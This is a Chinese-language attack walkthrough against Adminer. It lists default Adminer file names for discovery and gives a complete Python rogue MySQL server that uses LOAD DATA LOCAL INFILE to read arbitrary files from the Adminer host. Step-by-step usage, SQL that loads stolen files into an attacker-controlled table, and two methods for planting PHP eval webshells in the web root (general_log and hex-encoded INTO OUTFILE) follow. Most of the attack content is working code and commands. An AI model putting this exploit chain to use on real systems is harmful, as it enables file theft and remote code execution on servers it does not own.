默认文件名:adminer.php
一些版本的文件名
adminer.php
sql.php
adminer-4.7.7.php
adminer-4.7.6.php
adminer-4.7.5.php
adminer-4.7.4.php
adminer-4.7.3.php
adminer-4.7.2.php
adminer-4.7.1.php
adminer-4.7.0.php
adminer-4.6.3.php
adminer-4.6.2.php
adminer-4.6.1.php
adminer-4.6.0.php
adminer-4.5.0.php
adminer-4.4.0.php
adminer-4.3.1.php
adminer-4.3.0.php
adminer-4.2.5.php
adminer-4.2.1.php
adminer-4.2.0.php
adminer-4.1.0.php
adminer-4.0.3.php
adminer-4.0.2.php
adminer-4.0.1.php
adminer-4.0.0.php
adminer-3.7.1.php
adminer-3.7.0.php
adminer-3.6.4.php
adminer-3.6.3.php
adminer-3.6.2.php
adminer-3.6.1.php
adminer-3.6.0.php
adminer-3.5.1.php
adminer-3.5.0.php
adminer-3.4.0.php
adminer-3.3.4.php
adminer-3.3.3.php
adminer-3.3.2.php
adminer-3.3.1.php
adminer-3.3.0.php
adminer-3.2.2.php
adminer-3.2.0.php
adminer-3.1.0.php
adminer-3.0.1.php
adminer-3.0.0.php
adminer低版本(更准确地说,是其底层 PHP MySQL 客户端未禁用 local infile 的情况)可被恶意 MySQL 服务端通过 LOAD DATA LOCAL INFILE 请求读取客户端(即 Adminer 所在主机)的任意可读文件:https://xz.aliyun.com/t/8309
POC
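# coding=utf-8
"""Rogue MySQL server that asks the connecting client for a local file.

Usage:  python poc.py <path-on-the-client>

The listener accepts a single connection, replies with a canned server
greeting, accepts whatever credentials the client sends, and answers the
client's first query with a LOAD DATA LOCAL INFILE request (0xFB) for the
given path. A client that allows local infile then streams that file back.

Changes from the original POC: Python 3 (bytes on the wire), symbolic
socket option names instead of Linux-only magic numbers, a correctly
encoded 3-byte packet length (the original wrote only its low byte via
chr(), which corrupts the header for paths of 255 bytes or more), the
reply read packet by packet up to the client's empty terminating packet,
and a socket timeout so a client that refuses the request does not hang
the script forever.
"""
import logging
import socket
import sys

logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)

LISTEN_PORT = 3306
CLIENT_TIMEOUT = 10  # seconds to wait for each packet from the client

# Initial handshake packet, byte-for-byte what the original POC sent.
GREETING = (
    b"\x4a\x00\x00\x00"  # payload length 74, sequence id 0
    b"\x0a"  # protocol version 10
    b"5.5.53\x00"  # server version string
    b"\x17\x00\x00\x00"  # connection id
    b"\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00"  # auth-plugin-data part 1 + filler
    b"\xff\xf7"  # capability flags, low 16 bits (bit 0x80 = CLIENT_LOCAL_FILES)
    b"\x21"  # character set 33 (utf8_general_ci)
    b"\x02\x00"  # status flags
    b"\x0f\x80"  # capability flags, high 16 bits
    b"\x15"  # auth-plugin-data length
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # reserved
    b"\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00"  # auth-plugin-data part 2
    b"mysql_native_password\x00"  # auth plugin name
)

# OK packet (sequence id 2): header 0x00, affected rows 0, last insert id 0,
# status 0x0002, warnings 0. Sent regardless of which credentials arrived.
OK_PACKET = b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00"


def local_infile_request(filename, sequence=1):
    """Return the LOAD DATA LOCAL INFILE request packet for *filename*.

    The payload is 0xFB followed by the path; the 4-byte header is the
    3-byte little-endian payload length plus the sequence id.
    """
    payload = b"\xFB" + filename.encode("utf-8")
    return len(payload).to_bytes(3, "little") + bytes([sequence]) + payload


def _recv_exact(conn, n):
    """Read exactly *n* bytes from *conn*, or return None if the peer closes first."""
    data = bytearray()
    while len(data) < n:
        chunk = conn.recv(n - len(data))
        if not chunk:
            return None
        data += chunk
    return bytes(data)


def recv_file(conn):
    """Collect the file the client sends back, packet by packet.

    Stops at the empty packet that terminates the transfer, or at EOF.
    Returns the concatenated payloads (the raw file contents); a client that
    sends nothing yields b"".
    """
    payloads = []
    while True:
        header = _recv_exact(conn, 4)
        if header is None:
            break
        length = int.from_bytes(header[:3], "little")
        if length == 0:
            break  # empty packet = end of file transfer
        body = _recv_exact(conn, length)
        if body is None:
            break
        payloads.append(body)
    return b"".join(payloads)


def main(argv=None):
    """Serve one rogue-MySQL connection and log the file the client returns.

    Returns a process exit status: 0 on success, 1 if the client never sent
    the file, 2 on bad usage.
    """
    argv = sys.argv[1:] if argv is None else argv
    if len(argv) != 1:
        sys.stderr.write("usage: python poc.py <path-on-the-client>\n")
        return 2
    filename = argv[0]

    with socket.socket() as server:
        # The original called setsockopt(1, 2, 1): Linux's numeric values of
        # SOL_SOCKET / SO_REUSEADDR. The symbolic names are portable.
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("", LISTEN_PORT))
        server.listen(5)
        conn, address = server.accept()

    with conn:
        conn.settimeout(CLIENT_TIMEOUT)
        log.info("Conn from: %r", address)
        conn.sendall(GREETING)
        conn.recv(9999)  # handshake response; credentials are ignored
        log.info("auth okay")
        conn.sendall(OK_PACKET)
        conn.recv(9999)  # the client's first query, whatever it is
        log.info("want file...")
        conn.sendall(local_infile_request(filename))
        try:
            content = recv_file(conn)
        except socket.timeout:
            log.error("client did not send the file (local infile disabled on the client?)")
            return 1
        if not content:
            log.error("client returned no data for %r", filename)
            return 1
        log.info("%d bytes of %r:\n%s", len(content), filename,
                 content.decode("utf-8", "replace"))
    return 0


if __name__ == "__main__":
    sys.exit(main())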
随意填写账号密码登录(连接失败即可),从 Adminer 的报错信息中获得其所在目录的绝对路径,供后续指定要读取的文件
攻击机执行命令准备读取文件:
python poc.py "C:\phpstudy_pro\WWW\1.php"
输入服务器地址,账号密码随意,点击登录
成功读取到文件内容
在攻击机的 MySQL 上新建库和表,并允许所用账号远程连接(开启外连),供靶机 Adminer 连入
-- Attacker-side staging: a database and a single-column table that will
-- receive the victim's file line by line via LOAD DATA LOCAL INFILE.
create database adminer;
use adminer;
-- One TEXT(4096) column; the column name "text" is a keyword-like name but
-- is accepted as an identifier here.
create table test(text text(4096));
访问靶机,输入攻击机的数据库信息
注意:secure_file_priv 只限制 MySQL 服务端自身的文件读写(如后面的 select ... into outfile 写 webshell),靶机 MySQL 的 secure_file_priv 需要为空字符串,为 NULL 时无法导出。而 load data local infile 读取的是客户端(Adminer 所在主机)的文件,是否成功取决于客户端是否允许 local infile,与靶机的 secure_file_priv 无关
执行命令
-- Run from Adminer while it is connected to the attacker's MySQL: the client
-- (Adminer's PHP process) reads this path from its own host and ships it to
-- the attacker's table. Each '\n'-terminated chunk becomes one field/row.
load data local infile "C:\\phpstudy_pro\\WWW\\1.php" into table test FIELDS TERMINATED BY '\n';
查看表信息,成功读取到文件
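-- Check the current general-log settings (general_log, general_log_file).
show variables like '%general%';
-- Turn on the general query log. SET GLOBAL needs a privileged account
-- (SUPER / SYSTEM_VARIABLES_ADMIN) and the mysqld process must be able to
-- write the log path chosen below. Terminated with ';' so it is not merged
-- with the next statement when these lines are pasted as one batch.
set global general_log=on;
-- Point the log at a file under the web root; the text of every query
-- executed from now on is written into that .php file (with log metadata
-- around it), which is enough for PHP to execute the tag.
set global general_log_file='C:\\phpstudy_pro\\WWW\\shell.php';
-- The query itself is the payload: its text lands in shell.php.
select "<?php @eval($_POST['1']);?>";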
连接 webshell
-- Alternative write path: SELECT ... INTO OUTFILE with the payload as a hex
-- literal (0x3c3f...3e decodes to <?php @eval($_POST[1]);?>, note the
-- unquoted key). Needs the FILE privilege on the target MySQL and an empty
-- secure_file_priv; with secure_file_priv=NULL the export is refused, and the
-- mysqld process must be able to write to the web root.
select 0x3c3f70687020406576616c28245f504f53545b315d293b3f3e into outfile "C:\\phpstudy_pro\\WWW\\1.php";